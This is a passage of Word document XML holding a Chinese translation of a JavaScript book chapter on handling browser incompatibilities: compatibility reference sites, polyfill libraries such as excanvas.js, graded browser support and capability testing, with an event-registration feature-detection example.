        <w:t>特性的实现状态，允许根据各种标准进行过滤，并在某个特性只剩下少量已部署的浏览器不支持时推荐使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>http://www.quirksmode.</w:t>
      </w:r>
      <w:r>
        <w:t>org/dom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:t>W3C</w:t>
      </w:r>
      <w:r>
        <w:t>标准列出的各种浏览器的</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>兼容性表格。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>http://webdevout.net/browser-support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>另一个跟踪浏览器开发商对于</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>标准的实现的站点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，列表的最后三个站点是由个人维护的。尽管它们是客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的先行者，但这些站点可能不会总是保持最新。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当然，意识到浏览器之间的兼容性问题只是第一步。接下来，你需要解决这些不兼容性。一种策略是限制自己使用你选择支持的所有浏览器都普遍支持的特性（或者很容易模拟出的特性）。之前提及的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>何时可用</w:t>
      </w:r>
      <w:r>
        <w:t>……”</w:t>
      </w:r>
      <w:r>
        <w:t>这个网站（</w:t>
      </w:r>
      <w:r>
        <w:t>http://a.deveria.com/caniuse</w:t>
      </w:r>
      <w:r>
        <w:t>）就是围绕这个策略的：它列出了所有等</w:t>
      </w:r>
      <w:r>
        <w:t>IE6</w:t>
      </w:r>
      <w:r>
        <w:t>淘汰之后才能用的新特性，等</w:t>
      </w:r>
      <w:r>
        <w:t>IE6</w:t>
      </w:r>
      <w:r>
        <w:t>淘汰之后，这个网站也没有存在的必要了。下面几节介绍一种略有点消极的对付客户端不兼容性问题的策略。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="318" w:name="13_4_1_Chu_Li_Jian_Rong_Xing_Wen_Ti_De_L"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>13.4.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　处理兼容性问题的类库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="318"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>处理不兼容问题其中一种最简单的方法是使用类库。</w:t>
      </w:r>
      <w:r>
        <w:t>比如，考虑客户端图像的＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素（第</w:t>
      </w:r>
      <w:r>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:t>章的主题）。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>是唯一不支持这个特性的当前浏览器。它支持一种晦涩的客户端图形语言，叫做</w:t>
      </w:r>
      <w:r>
        <w:t>VML</w:t>
      </w:r>
      <w:r>
        <w:t>，尽管如此，</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>元素可以基于它进行模拟。开源的</w:t>
      </w:r>
      <w:r>
        <w:t>"explorer canvas"</w:t>
      </w:r>
      <w:r>
        <w:t>项目在</w:t>
      </w:r>
      <w:r>
        <w:t>http://code.google.com/p/explorercanvas</w:t>
      </w:r>
      <w:r>
        <w:t>上已经发布了一个类库，就是做这件事情：引入一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码文件叫做</w:t>
      </w:r>
      <w:r>
        <w:t>excanvas.js</w:t>
      </w:r>
      <w:r>
        <w:t>，然后</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>就会看起来像它支持＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>当前正在使用的浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>客户端</w:t>
      </w:r>
      <w:r>
        <w:t>Jav</w:t>
      </w:r>
      <w:r>
        <w:t>aScript</w:t>
      </w:r>
      <w:r>
        <w:t>是一个充满变化的概念，特别是随着</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的出现。因为平台的快速演变，我们往往不会使用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>某些特定版本的浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>这种狭义的措辞表述。所有这样的表述在本书下一版出版之前就过时了。因此，你会发现我经常使用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>所有当前的浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>除</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>之外当前所有浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）放入我所表述的语境中。在撰写本书时，当前的（非测试版）的浏览器是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·Internet Explorer 8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·Firefox 3.6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·Safari 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·Chrome 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·Opera 10.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当本书上架时，当前浏览器可能会是</w:t>
      </w:r>
      <w:r>
        <w:t>In</w:t>
      </w:r>
      <w:r>
        <w:t>ternet Explorer 9</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 4</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Safari 5</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome 11</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Opera 11</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>但并不是说本书中所有提到的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>当前浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>都是这个含义，我只是希望大家能了解在撰写本书时所使用的浏览器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本书第</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>版用了词语</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>现代浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>当前浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。那个版本在</w:t>
      </w:r>
      <w:r>
        <w:t>2006</w:t>
      </w:r>
      <w:r>
        <w:t>年发布，那时候的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>当前浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 1.5</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>IE6</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Safari 2</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Opera 8.5</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器还不存在）。本书中保留的所有关于</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>现代浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的表述都可以理解</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>所有浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，因为比这</w:t>
      </w:r>
      <w:r>
        <w:t>些还老的浏览器已经很少了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本书（特别是第</w:t>
      </w:r>
      <w:r>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:t>章）描述的一些最新的客户端特性，这些特性还没有在所有的浏览器里实现。然而这些特性都在一个开放的标准流程下进行开发，已经在至少一个发布的浏览器里实现，并看起来会被所有浏览器厂商接受（可能除</w:t>
      </w:r>
      <w:r>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r>
        <w:t>之外）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>excanvas.js</w:t>
      </w:r>
      <w:r>
        <w:t>是一个兼容类库的很纯粹的例子。在开发过程中，可能会对某个特性编写类似的类库。</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>数组方法（</w:t>
      </w:r>
      <w:r>
        <w:t>7.9</w:t>
      </w:r>
      <w:r>
        <w:t>节），比如</w:t>
      </w:r>
      <w:r>
        <w:t>forEach()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>，可以在</w:t>
      </w:r>
      <w:r>
        <w:t>ES3</w:t>
      </w:r>
      <w:r>
        <w:t>中几乎完美模拟，并且通过把合适的类库添加到页面中，可以把这些</w:t>
      </w:r>
      <w:r>
        <w:t>强大有用的方法当做所有浏览器平台基线的部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>但是，有时候，不可能完全地（或有效地）在一个不支持某个特性的浏览器上实现一个特性。就像已经提到的，</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>是唯一没有实现标准事件处理</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器，包括注册事件处理程序的</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>支持一个类似的方法叫做</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>不像</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>一样强大，并且在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>提供的基础上透明地实现整个标准并非真正可行。反之，开发者有时定义一个折中的事件处理方法，通常叫</w:t>
      </w:r>
      <w:r>
        <w:t>addEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>，它</w:t>
      </w:r>
      <w:r>
        <w:t>可以用</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>来方便地实现绑定事件的功能。然后，它们在所有的代码里用</w:t>
      </w:r>
      <w:r>
        <w:t>addEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>来代替</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在实际的开发工作中，今天不少</w:t>
      </w:r>
      <w:r>
        <w:t>We b</w:t>
      </w:r>
      <w:r>
        <w:t>开发者在它们所有的</w:t>
      </w:r>
      <w:r>
        <w:t>We b</w:t>
      </w:r>
      <w:r>
        <w:t>页面上用了客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>框架，比如</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>（参见第</w:t>
      </w:r>
      <w:r>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t>章）。使这些框架必不可少的一个重要功能是：它们定义了新的客户端</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>并兼容所有浏览器。例如，在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>里，事件处理程序的注册是</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>通过叫</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>的方法完成的。</w:t>
      </w:r>
      <w:r>
        <w:t>如果你基于</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>做所有的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>开发，你就永远不需要考虑</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>之间的不兼容性问题。参见</w:t>
      </w:r>
      <w:r>
        <w:t>13.7</w:t>
      </w:r>
      <w:r>
        <w:t>节获得更多关于客户端框架的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="319" w:name="13_4_2_Fen_Ji_Liu_Lan_Qi_Zhi_Chi_"/>
      <w:r>
        <w:t>13.4.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　分级浏览器支持</w:t>
      </w:r>
      <w:bookmarkEnd w:id="319"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>分级浏览器（</w:t>
      </w:r>
      <w:r>
        <w:t>graded browser support</w:t>
      </w:r>
      <w:r>
        <w:t>）是由</w:t>
      </w:r>
      <w:r>
        <w:t>Yahoo!</w:t>
      </w:r>
      <w:r>
        <w:t>率先提出的一种测试技术。从某种维度对浏览器厂商</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>版本</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>操作系统变体进行分级。分级浏览器中的</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>级要通过所有的功能测试用例。对于</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>级浏览器来说则不必所有用例都通过测试。</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>级浏览器需要网页完全可用，</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>级浏览器只需在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>完</w:t>
      </w:r>
      <w:r>
        <w:t>整情况下可用即可，而不需要</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>都正常工作。那些不是</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>级和</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>级的浏览器都称做</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>级浏览器：这部分都是全新的浏览器或者太罕见的浏览器。我们默认在这些浏览器中都是网页完全可用的，但官方并不会对</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>级浏览器中的功能提供完整支持和测试。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>你可以在</w:t>
      </w:r>
      <w:r>
        <w:t>http://developer.yahoo.com/yui/articles/gbs</w:t>
      </w:r>
      <w:r>
        <w:t>阅读更多关于</w:t>
      </w:r>
      <w:r>
        <w:t>Yahoo!</w:t>
      </w:r>
      <w:r>
        <w:t>的分级浏览器支持情况。这个页面还存有</w:t>
      </w:r>
      <w:r>
        <w:t>Yahoo!</w:t>
      </w:r>
      <w:r>
        <w:t>当前的</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>级和</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>级浏览器列表（这个列表每季度更新一次）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:r>
        <w:t>。就算自己没有采用任何一种分级浏览器测试</w:t>
      </w:r>
      <w:r>
        <w:t>基准，使用</w:t>
      </w:r>
      <w:r>
        <w:t>Yahoo!</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>级浏</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>览器列表是一种简单快捷的办法，通过查阅这个列表也能清楚地知道当前比较流行的浏览器是哪些。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="320" w:name="13_4_3_Gong_Neng_Ce_Shi_"/>
      <w:r>
        <w:t>13.4.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　功能测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="320"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>功能测试（</w:t>
      </w:r>
      <w:r>
        <w:t>capability testing</w:t>
      </w:r>
      <w:r>
        <w:t>）是解决不兼容性问题的一种强大技术。如果你想试用某个功能，但又不清楚这个功能是否在所有的浏览器中都有比较好的兼容性，则需要在脚本中添加相应的代码来检测是否在浏览器中支持该功能。如果期望使用的功能还没有被当前的平台所支持，要么不在该平台中使用它，要么提供可在所有平台上运行的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>你将会在后面的各章中一次又一次地看到功能测</w:t>
      </w:r>
      <w:r>
        <w:t>试。例如，在第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章，有如下所示的代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(element.addEventListener){//</w:t>
      </w:r>
      <w:r>
        <w:t>在使用这个</w:t>
      </w:r>
      <w:r>
        <w:t>W3C</w:t>
      </w:r>
      <w:r>
        <w:t>方法之前首先检测它是否可用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>element.addEventListener("keydown",handler,false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>element.addEventListener("keypress",handler,false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(element.attachEvent){//</w:t>
      </w:r>
      <w:r>
        <w:t>在使用该</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>方法之前首先检测它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>element.attachEvent("onkeydown",handler);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>element.attachEvent("onkeypress",handler);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，选择普遍支持的技术</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>element.onkeydown=element.onkeypress=handler;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关于功能测试最重要的是，它并不涉及浏览器开发商和浏览器的版本号。代码在当前的浏览器集合中有效，在浏览器的后续版本中也同样有效，而不管后续的浏览器是否实现了这些功能的集合。但要注意的是，这种方法需要测试</w:t>
      </w:r>
      <w:r>
        <w:t>某个属性或方法是否在浏览器中已经定义了，除非该属性或方法完全可用。如果</w:t>
      </w:r>
      <w:r>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r>
        <w:t>要定义一个</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
